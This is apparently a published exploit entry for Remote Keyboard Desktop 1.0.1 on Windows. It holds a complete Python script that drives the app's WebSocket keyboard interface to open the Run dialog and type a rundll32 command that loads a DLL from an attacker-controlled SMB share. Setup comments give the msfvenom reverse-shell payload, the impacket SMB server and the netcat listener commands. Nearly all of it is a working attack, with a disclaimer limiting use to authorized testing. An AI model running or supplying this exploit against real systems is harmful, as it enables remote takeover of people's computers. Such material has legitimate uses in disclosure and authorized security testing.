# Exploit Title: Remote Keyboard Desktop 1.0.1 Remote Code Execution
# # Exploit Title: Remote Keyboard Desktop 1.0.1 Remote Code Execution
# Date: 05/17/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://remotecontrolio.web.app/
# Software Link:
https://apps.microsoft.com/detail/9n0jw8v5sc9m?hl=neutral&gl=US&ocid=pdpshare
# Version: 1.0.1
# Tested on: Windows 10 Pro Build 19045


#####
# [IMPORTANT LEGAL NOTICE]
# THIS EXPLOIT IS FOR AUTHORIZED TESTING ONLY.
# USE ONLY ON SYSTEMS YOU OWN OR HAVE EXPLICIT PERMISSION TO TEST.
# UNAUTHORIZED USE MAY VIOLATE LAWS (CFAA, GDPR, ETC.).


# Start Remote Keyboard Desktop on your windows
# Preparing:
#
# 1. Generating payload (dll/exe):
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.105 LPORT=8080 -f
dll > shell.dll
#
# 2. Start smb server: impacket-smbserver SHARE . -smb2support
#
# 3. nc -lnvp 8080
# 4. python exploit.py
#####

#!/usr/bin/env python3

import websocket
import json
import time

target = "192.168.8.105"
lhost = "192.168.8.101"
WS_URL = f"ws://{target}:8080/"
payload = "shell2.dll" # payload dll/exe filename
debug = False

HEADER_LIST = [
"User-Agent: Dart/3.7 (dart:io)",
f"Origin: http://{target}:8080",
"Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits"
]

#SMB_PATH = f"cmd /c \\\\{lhost}\\SHARE\\{payload}" # exe based

SMB_PATH = f"rundll32.exe \\\\{lhost}\\SHARE\\{payload},ExportedFunc" # dll
based

special_mapping = {
' ': ("SPACE", False),
'/': ("NUMPAD_DIVIDE", False),
'\\': ("\\", False),
'.': ("NUMPAD_DECIMAL", False),
',': (",", False),
}

def send_key_event(ws, key, key_down):
event = {"command": "keyboard_event", "data": {"key": key, "keyDown":
key_down, "capsLock": False}}
ws.send(json.dumps(event))

def send_text(ws, text, delay=0.05):
shift_pressed = False
for ch in text:
if ch in special_mapping:
key_name, need_shift = special_mapping[ch]
elif ch.isalpha():
need_shift = ch.isupper()
key_name = ch.upper()
elif ch.isdigit():
key_name = ch
need_shift = False
else:
raise ValueError(f"No key mapping for character: {ch!r}")

if need_shift and not shift_pressed:
send_key_event(ws, "SHIFT", True)
shift_pressed = True
elif not need_shift and shift_pressed:
send_key_event(ws, "SHIFT", False)
shift_pressed = False

send_key_event(ws, key_name, True)
send_key_event(ws, key_name, False)
time.sleep(delay)

if shift_pressed:
send_key_event(ws, "SHIFT", False)

def send_key(ws, keys, delay=0.05):
for key in keys:
send_key_event(ws, key, True)
time.sleep(delay)
for key in reversed(keys):
send_key_event(ws, key, False)

def on_open(ws):
print ("Let's start!")

send_key(ws, ["LEFT_WINDOWS", "R"])
time.sleep(0.5)

send_text(ws, SMB_PATH)
send_key(ws, ["RETURN"])
print ("Executing...")
time.sleep(1.2)

print("Check your listener!")
if debug:

print("\033[42;37mExploit by blue0x1 - github.com/blue0x1\033[0m
")

ws.close()

def on_message(ws, message):
if debug:
print("[=] Received:", message)

def on_error(ws, error):
if debug:
print("[!] Error:", error)

def on_close(ws, code, reason):
if debug:
print(f"[x] Closed: {code} - {reason}")

if __name__ == "__main__":
websocket.enableTrace(debug)
ws = websocket.WebSocketApp(
WS_URL,
header=HEADER_LIST,
on_open=on_open,
on_message=on_message,
on_error=on_error,
on_close=on_close
)

ws.run_forever()